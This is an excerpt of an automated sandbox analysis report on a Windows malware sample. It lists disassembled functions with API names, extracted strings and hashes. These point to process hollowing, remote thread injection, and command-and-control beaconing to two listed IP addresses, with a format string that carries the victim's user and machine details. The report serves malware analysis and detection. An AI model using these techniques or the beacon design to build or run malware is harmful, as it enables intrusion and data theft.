                                                                                        Function 00007FF795D2F204 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 445COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName
                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                        • API String ID: 514040917-3001742581
                                                                                        • Opcode ID: b908c4bbb58855851690610d9eaba40de91e681cb9da683074f69fec9867cf37
                                                                                        • Instruction ID: 8379e16096a7d683ba18103c81a1c042c144a2a26fb5a42f50ae508dc60ef600
                                                                                        • Opcode Fuzzy Hash: b908c4bbb58855851690610d9eaba40de91e681cb9da683074f69fec9867cf37
                                                                                        • Instruction Fuzzy Hash: DC32C932608A9286E7B0DB25E49536AF7E1FBC8B84F405536DA8D83B68DF7CD445CB10
                                                                                        Function 00007FF795D2EF58 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF795D2EF95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocFileProcessRead
                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                        • API String ID: 4279794846-2771526726
                                                                                        • Opcode ID: c286b5aeaee3a95e6f793a4cad3823bc7d6503c806200300204d2a70b13d1204
                                                                                        • Instruction ID: eba40a06d78dee747cf3d30be7a65d260ca917b2303caa1e4cb3e6942c254612
                                                                                        • Opcode Fuzzy Hash: c286b5aeaee3a95e6f793a4cad3823bc7d6503c806200300204d2a70b13d1204
                                                                                        • Instruction Fuzzy Hash: 0771EB3261CA9186E760EF65F49472AB7A0FBC5B94F906035EA8E43B58CF7DD448CB10
                                                                                        Function 00007FF795D11B30 Relevance: 34.7, APIs: 23, Instructions: 169nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseHandleResume$Suspend
                                                                                        • String ID:
                                                                                        • API String ID: 4073281515-0
                                                                                        • Opcode ID: dd1db8065b8b72934f9a832ddd55b7f2970ebeaf73aedca523161806716b0cef
                                                                                        • Instruction ID: 2a9793b8864ab60e152a38f4497a6ba7d4d0e74b25f4127f366b6f2a135df784
                                                                                        • Opcode Fuzzy Hash: dd1db8065b8b72934f9a832ddd55b7f2970ebeaf73aedca523161806716b0cef
                                                                                        • Instruction Fuzzy Hash: AB91CC3150CA9186E764EF75F49437AB7A0FBC4B84F901135E68E86AA8DF7CD485CB20
                                                                                        Function 00007FF795D33B98 Relevance: 21.1, APIs: 14, Instructions: 146COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$Info$__crt$_calloc_crtfree$A_statErrorLastSleepUpdateUpdate::__calloc_impl_invoke_watson
                                                                                        • String ID:
                                                                                        • API String ID: 411824461-0
                                                                                        • Opcode ID: 564419ca50e371d3acc34bb99ed49dc042e36028f0c6e1de800d56395efabe84
                                                                                        • Instruction ID: 9652a2bd75386b12568906d3f62fde1f0667daee64121657241bfbc8a9eb6118
                                                                                        • Opcode Fuzzy Hash: 564419ca50e371d3acc34bb99ed49dc042e36028f0c6e1de800d56395efabe84
                                                                                        • Instruction Fuzzy Hash: 79511511B1926302FA70BA32AA907BAD2C16F95FC8F946034ED0D8BB95DE3DE401C320
                                                                                        Function 00007FF795D110D4 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: OpenProcess
                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                        • API String ID: 3743895883-721857904
                                                                                        • Opcode ID: 997f9696530ca3d2e2a924b5a8e3b77fe72128a8fbc0c0d691b2ed488240cbf6
                                                                                        • Instruction ID: bb1923668ce07f42279ff0674bbd1c553c27eb889f8334f1f5d328749d4f6396
                                                                                        • Opcode Fuzzy Hash: 997f9696530ca3d2e2a924b5a8e3b77fe72128a8fbc0c0d691b2ed488240cbf6
                                                                                        • Instruction Fuzzy Hash: ED712A3290DA9586E774EBA5F48437AF7E0FB84B80F905135E68D86A98DF7CD484CB10
                                                                                        Function 00007FF795D30E78 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 1083639309-0
                                                                                        • Opcode ID: 33d517ba9ed34bad332c22683f5269e417fb0aac9e56d6b41238f0337e4f5fc0
                                                                                        • Instruction ID: ac20689208ff6fffcdb5829c036c3f9a9e77f37e24e94f045dd909903e211919
                                                                                        • Opcode Fuzzy Hash: 33d517ba9ed34bad332c22683f5269e417fb0aac9e56d6b41238f0337e4f5fc0
                                                                                        • Instruction Fuzzy Hash: 8721B221A1C96282E770AB21F49433AE3A1FBC4F99F846235E59E425A8DF3CD545C760
                                                                                        Function 00007FF795D2CD90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: _errno$AllocHeapNameUser_callnewhfreemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 982591855-0
                                                                                        • Opcode ID: cadc991865815251f5f87effce6c4517c62175ad35677cb75216a9f745d246b1
                                                                                        • Instruction ID: 1cb5c19da68bf7bdc5c7821819f7b85be305dab2313f21e8934676fa719499f2
                                                                                        • Opcode Fuzzy Hash: cadc991865815251f5f87effce6c4517c62175ad35677cb75216a9f745d246b1
                                                                                        • Instruction Fuzzy Hash: E4219936B08A5596EB20AF25E48132AB3E0F7C9F84F909031EA8D87765DF7DD8448B10
                                                                                        Function 00007FF795D124E8 Relevance: 10.6, APIs: 7, Instructions: 137memoryinjectionCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocMemoryProcessVirtualWrite
                                                                                        • String ID:
                                                                                        • API String ID: 645232735-0
                                                                                        • Opcode ID: 9846827d6b8e06299e9a05d4f878c346567fa6bf18a5ac3c9d23b35c2b6f147d
                                                                                        • Instruction ID: a59b93d396836f4dfeccb396c2b094082797fea4a6e6bf825ffc4613eae908d2
                                                                                        • Opcode Fuzzy Hash: 9846827d6b8e06299e9a05d4f878c346567fa6bf18a5ac3c9d23b35c2b6f147d
                                                                                        • Instruction Fuzzy Hash: 4571C836648B5586DB64DB2AE48032AABE1F789FC4F405035EA8D83B68DF3DE445CB50
                                                                                        Function 00007FF795D133F8 Relevance: 7.6, APIs: 5, Instructions: 50nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$ErrorFreeHeapInformationLastQuerySystem_errnomalloc
                                                                                        • String ID:
                                                                                        • API String ID: 76496729-0
                                                                                        • Opcode ID: 5a7b4308a923f00615bebbf7bced7e92388ca8185c8d29abf5f0f076eaa07afc
                                                                                        • Instruction ID: 97e61b132c183e94572a75dd95134ea9b9e3290ae6f10702faa003c53bdb8abb
                                                                                        • Opcode Fuzzy Hash: 5a7b4308a923f00615bebbf7bced7e92388ca8185c8d29abf5f0f076eaa07afc
                                                                                        • Instruction Fuzzy Hash: D121E67291C6618AE775EB34E08472EF2E0FB84B48F802135F68E46A99CF7CD585CB14
                                                                                        Function 00007FF795D2D070 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Version_snprintf
                                                                                        • String ID: 3.2$info=1&uid=%s&ver=%s&os=%u.%u.%u&cmpname=%s&username=%s&ut=%d&av=%d
                                                                                        • API String ID: 2221195653-1629646224
                                                                                        • Opcode ID: d8e065c0954a299e65155b93d3e3b5ceec94708ba317d722836e874e1f68d53d
                                                                                        • Instruction ID: e7c6296cc83dd76065ca626466e07ee336c5fadee01f32bc00be8485f8622404
                                                                                        • Opcode Fuzzy Hash: d8e065c0954a299e65155b93d3e3b5ceec94708ba317d722836e874e1f68d53d
                                                                                        • Instruction Fuzzy Hash: E951C832608AC586D774EB25E4843AAB7A1F7C8790F905235DA9D83BA8DF7CD445CF10
                                                                                        Function 00007FF795D1312C Relevance: 4.6, APIs: 3, Instructions: 97nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CreateInformationQuery
                                                                                        • String ID:
                                                                                        • API String ID: 3399482958-0
                                                                                        • Opcode ID: d0a1b496ef4acfd9d1adaaa03207ab10c459d0b8102526685db81c84b86b5cc0
                                                                                        • Instruction ID: 5154ae763ed273e377a610fc65b68554d79c028075fb22b87607d68541f86f2b
                                                                                        • Opcode Fuzzy Hash: d0a1b496ef4acfd9d1adaaa03207ab10c459d0b8102526685db81c84b86b5cc0
                                                                                        • Instruction Fuzzy Hash: 91513672508B9086E7A0DB25F4843AAB7E0FB85794F901235E6CD47AA8DF3DD049CB50
                                                                                        Function 00007FF795D2CCD4 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID:
                                                                                        • API String ID: 3429775523-0
                                                                                        • Opcode ID: 4f11fd27218308b27aec18665efe2a0a9f3ef76be2421953362379dfee997c75
                                                                                        • Instruction ID: 2b81f15dc6c35c0c0d86a57254f90cc8073146f096dbdf6b48e9463a71db0910
                                                                                        • Opcode Fuzzy Hash: 4f11fd27218308b27aec18665efe2a0a9f3ef76be2421953362379dfee997c75
                                                                                        • Instruction Fuzzy Hash: F511BA7250C78086E3209F24F49835BBBE0F795748F501168E6C94BB99CB7ED509CF91
                                                                                        Function 00007FF795D13328 Relevance: 1.5, APIs: 1, Instructions: 47filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileInformationQuery
                                                                                        • String ID:
                                                                                        • API String ID: 365787318-0
                                                                                        • Opcode ID: 24e99ca03b8a7b22beea0223d64960cda4c10f857ed4866b0de594b88d33f52b
                                                                                        • Instruction ID: 512148544420821dbab82b8fc7ce584933b5ce4be23e2e316d5e78e9007b9cc5
                                                                                        • Opcode Fuzzy Hash: 24e99ca03b8a7b22beea0223d64960cda4c10f857ed4866b0de594b88d33f52b
                                                                                        • Instruction Fuzzy Hash: 88115132728B8582EB50DB69F48435AE7E1FB84B84F805035EA8E87B98DF7DC044CB40
                                                                                        Function 00007FF795D11750 Relevance: 1.5, APIs: 1, Instructions: 27nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryReadVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2834387570-0
                                                                                        • Opcode ID: e37ea6d5cfa663525e7d3595c83ddabc02f25026516b5b2ca3fb5f39fa489ef9
                                                                                        • Instruction ID: 84efc10cb9756d266bb08cf94dfecca90ad9e3d502b554ae3bf04fc9ddc6826a
                                                                                        • Opcode Fuzzy Hash: e37ea6d5cfa663525e7d3595c83ddabc02f25026516b5b2ca3fb5f39fa489ef9
                                                                                        • Instruction Fuzzy Hash: 9CF0E27661CB8482D790DB25F48436AB7A4F788BD0F906125EA8A43B68DF7CD590CB40
                                                                                        Function 00007FF795D11420 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoSystem
                                                                                        • String ID:
                                                                                        • API String ID: 31276548-0
                                                                                        • Opcode ID: 07b0131c33eac5e3efe23aa784cbfaf8d0e4a7ec67cae34542dd74c4bcf16228
                                                                                        • Instruction ID: d5f249b4eaaffb073f7c46287f7d7c8e707fe396ec332f5c0ab30cee0eea4cd4
                                                                                        • Opcode Fuzzy Hash: 07b0131c33eac5e3efe23aa784cbfaf8d0e4a7ec67cae34542dd74c4bcf16228
                                                                                        • Instruction Fuzzy Hash: 8FE06D22A0806182E7709B70E44433AA1E2FB84F48FC00231E6DDC26D4EE2CCA84CB10
                                                                                        Function 00007FF795D3AC1C Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2c0d635d2ffbf617a8ed386c1eb5c9117f911d0490bef20500e44b7570a5cd06
                                                                                        • Instruction ID: 5b9caeca18d982462db19540e43c50de0e401e72f5e3b34201bd352479386085
                                                                                        • Opcode Fuzzy Hash: 2c0d635d2ffbf617a8ed386c1eb5c9117f911d0490bef20500e44b7570a5cd06
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Function 00007FF795D2EC18 Relevance: 59.7, APIs: 24, Strings: 10, Instructions: 163networksleepstringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectSendSleepstrlen
                                                                                        • String ID: /data.php$185.81.68.147$185.81.68.148$Content-Type: application/x-www-form-urlencodedConnection: close$Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0$POST$data=$err$err$err
                                                                                        • API String ID: 2240106504-3235050614
                                                                                        • Opcode ID: 28471d85fd49d0bd5f3af11c198ae44d0fa0b724d49c512276e690abd95f61e1
                                                                                        • Instruction ID: 96e0684d9af4b1241d587439326eaf49bc95e5f95f3f0df22ed84df95f73e314
                                                                                        • Opcode Fuzzy Hash: 28471d85fd49d0bd5f3af11c198ae44d0fa0b724d49c512276e690abd95f61e1
                                                                                        • Instruction Fuzzy Hash: 7D91C73260CA9186E760EB25F49476AF7A0FBC5B94F901135EA8D83B68DF7CD449CB10
                                                                                        Function 00007FF795D12314 Relevance: 36.8, APIs: 11, Strings: 10, Instructions: 65libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
